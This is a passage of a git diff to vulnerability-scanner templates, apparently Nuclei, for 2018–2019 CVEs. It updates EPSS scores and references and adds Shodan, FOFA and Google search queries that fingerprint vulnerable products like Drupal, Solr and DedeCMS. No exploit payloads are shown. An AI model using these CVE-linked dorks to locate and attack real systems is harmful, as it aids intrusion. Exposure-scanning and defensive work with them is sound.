+ epss-score: 0.00072 + epss-percentile: 0.3103 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index e3bf2d980e..9f10e7535b 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 - epss-score: 0.37007 - epss-percentile: 0.96816 + epss-score: 0.36152 + epss-percentile: 0.97155 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,9 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress + publicwww-query: /wp-content/plugins/ninja-forms/ + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 783a9f2a6f..f3bd161914 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 - epss-score: 0.01158 - epss-percentile: 0.83304 + epss-score: 0.00845 + epss-percentile: 0.82119 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: zyxel product: vmg1312-b10d_firmware shodan-query: http.html:"VMG1312-B10D" + fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel http: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 2b040cfd71..038510ea48 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: wowza product: streaming_engine + shodan-query: http.title:"manager" product:"wowza streaming engine" + fofa-query: title="manager" product:"wowza streaming engine" + google-query: intitle:"manager" product:"wowza streaming engine" tags: cve2018,cve,wowza,lfi http: diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index fee4a77a5f..18852cc354 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.53963 + epss-percentile: 0.54797 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 509be08df3..dcec2bddcb 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 - epss-score: 0.00548 - epss-percentile: 0.76986 + epss-score: 0.0038 + epss-percentile: 0.72872 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 954f356eee..6489b3df7e 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 - epss-score: 0.09157 - epss-percentile: 0.94094 + epss-score: 0.03301 + epss-percentile: 0.91309 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 724cf401cd..6304862422 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19749 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index f5d120debe..3d18f63916 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 1bb158960f..82d738f155 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-19753 - http://seclists.org/fulldisclosure/2018/Nov/66 - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 - epss-score: 0.00942 - epss-percentile: 0.81358 + epss-score: 0.0066 + epss-percentile: 0.79557 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 7e5a3adf5f..bf0f6435cf 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19914 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index cb24374b98..4849988a1a 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19915 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 9825590c16..953e994164 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -14,13 +14,15 @@ info: - https://github.com/domainmod/domainmod/issues/88 - https://www.exploit-db.com/exploits/46372/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20009 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.51511 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 596427d5aa..6401a9bde0 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - epss-score: 0.60641 - epss-percentile: 0.97502 + epss-score: 0.2652 + epss-percentile: 0.96738 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 0079a9708c..64e5e72dc3 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00666 - epss-percentile: 0.79248 + epss-percentile: 0.79658 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: roxyfileman product: roxy_fileman google-query: intitle:"Roxy file manager" + shodan-query: http.title:"roxy file manager" + fofa-query: title="roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman http: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4645993b11..4c87867f11 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.58306 + epss-percentile: 0.58262 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index e8ffc11fdb..9fcb7d32f2 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.0117 - epss-percentile: 0.84668 + epss-score: 0.01061 + epss-percentile: 0.84101 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 0e6c47c32d..cca5ece28d 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.02132 - epss-percentile: 0.88082 + epss-percentile: 0.89226 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index d6912257c7..66281bf064 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -27,6 +27,9 @@ info: max-request: 3 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive http: diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 361edf7681..bd77c65d17 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-3167 - epss-score: 0.00492 - epss-percentile: 0.75672 + epss-score: 0.00519 + epss-percentile: 0.76719 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 2b65131fd4..8fe945a216 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.00471 - epss-percentile: 0.75103 + epss-percentile: 0.75585 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 837f9f59fe..40b848310b 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-5230 cwe-id: CWE-79 - epss-score: 0.00203 - epss-percentile: 0.58306 + epss-score: 0.00153 + epss-percentile: 0.51584 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index d997d2d8bf..117df9b4f3 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -19,13 +19,14 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.6862 + epss-percentile: 0.69184 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: getgrav product: grav_cms shodan-query: html:"Grav CMS" + fofa-query: body="grav cms" tags: cve,cve2018,xss,grav,getgrav http: diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index f27254d25f..b0003b1f1d 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -29,6 +29,7 @@ info: product: sugarcrm shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" google-query: intext:"SugarCRM Inc. All Rights Reserved" + fofa-query: body="sugarcrm inc. all rights reserved" tags: cve2018,cve,sugarcrm,xss,edb http: diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 718403b416..e4e740a06e 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -13,13 +13,15 @@ info: - https://www.exploit-db.com/exploits/43913 - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.3768 - epss-percentile: 0.96853 + epss-percentile: 0.97202 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 522a51ae06..9d3b618e4b 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -22,13 +22,14 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.72998 + epss-percentile: 0.73405 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js shodan-query: html:"/_next/static" + fofa-query: body="/_next/static" tags: cve2018,cve,nextjs,lfi,traversal,zeit http: diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 0d5d845508..dcaba6686e 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve,cve2018,redirect,vbulletin http: diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 1aab013c87..8ba372490a 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: dedecms product: dedecms + fofa-query: body="dedecms" + shodan-query: http.html:"dedecms" tags: cve,cve2018,dedecms http: diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index a1c22b1ced..38ef7d5c37 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - epss-percentile: 0.93558 + epss-percentile: 0.93709 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index f346c8cd40..80f34c24ca 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 - epss-score: 0.15744 - epss-percentile: 0.95443 + epss-score: 0.1391 + epss-percentile: 0.95658 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,6 +27,8 @@ info: product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor + fofa-query: title="printmonitor" + google-query: intitle:"printmonitor" tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 1360cf6272..93bad7a63c 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -14,13 +14,14 @@ info: - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70715 + epss-percentile: 0.73405 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 14b26eeaf0..502607e70a 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 - epss-score: 0.97568 + epss-score: 0.97566 epss-percentile: 1 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index aa1cc6dda2..9c7e4cd6ad 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7602 - epss-score: 0.97448 - epss-percentile: 0.99947 + epss-score: 0.97456 + epss-percentile: 0.99954 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 1f4589ccf7..d347ae0ded 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.81235 + epss-percentile: 0.81581 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,6 +27,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" + google-query: intitle:"yzmcms" tags: cve,cve2018,packetstorm,yzmcms,cms,xss http: diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 4296c733cd..1a19f074f3 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-7662 cwe-id: CWE-200 - epss-score: 0.00292 - epss-percentile: 0.65908 + epss-score: 0.00225 + epss-percentile: 0.60692 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index e7a7c1694a..ea0c5bd4f4 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -25,6 +25,8 @@ info: max-request: 1 vendor: dedecms product: dedecms + fofa-query: body="dedecms" + shodan-query: http.html:"dedecms" tags: cve,cve2018,dedecms,rce http: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 736443d83a..3dcd0ed56b 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -26,12 +26,13 @@ info: cve-id: CVE-2018-8006 cwe-id: CWE-79 epss-score: 0.34776 - epss-percentile: 0.97001 + epss-percentile: 0.97108 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: activemq + shodan-query: cpe:"cpe:2.3:a:apache:activemq" tags: cve2018,cve,apache,activemq,xss http: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index d79973fb02..851c9e01e0 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.04526 - epss-percentile: 0.92289 + epss-percentile: 0.92473 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve,cve2018,apache,ofbiz,xxe http: diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index a38abc6ad5..c2250d7fb5 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: embedthis product: appweb + shodan-query: cpe:"cpe:2.3:a:embedthis:appweb" tags: cve,cve2018,appweb,auth-bypass,embedthis http: diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index cba8bb1015..17e6c6f48a 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - epss-percentile: 0.9019 + epss-percentile: 0.91151 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 4327084e4d..031c8b8b47 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8823 cwe-id: CWE-94 epss-score: 0.24062 - epss-percentile: 0.96494 + epss-percentile: 0.96593 cpe: cpe:2.3:a:responsive_mega_menu_pro_project:responsive_mega_menu_pro:1.0.32:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 0c57ffd30b..e598e0a524 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.07018 - epss-percentile: 0.93812 + epss-percentile: 0.93949 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index a814e8ae7e..250b3b302f 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.02175 - epss-percentile: 0.89127 + epss-percentile: 0.89345 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 2f9e04ad8e..4b9aea984e 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub http: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 5c01cc8049..c102db69ea 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2019-0221 cwe-id: CWE-79 - epss-score: 0.00915 - epss-percentile: 0.82479 + epss-score: 0.01096 + epss-percentile: 0.84374 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2019,cve,apache,xss,tomcat,seclists,edb variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index ae5aac529e..c652f6af37 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2019,tenable,packetstorm,struts,rce,apache variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 8cfe5d05e2..450d51d916 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: kentico product: kentico + shodan-query: cpe:"cpe:2.3:a:kentico:kentico" tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf http: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 0c934003ec..20f33b0bd3 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2019-10092 cwe-id: CWE-79 epss-score: 0.07116 - epss-percentile: 0.9334 + epss-percentile: 0.93987 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2019,apache,htmli,injection http: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index b71e1cd822..1cf3fb43e7 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -29,6 +29,7 @@ info: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2019,redirect,apache,server http: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 96ba72bba3..7df027d093 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.00215 - epss-percentile: 0.58908 + epss-percentile: 0.59555 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 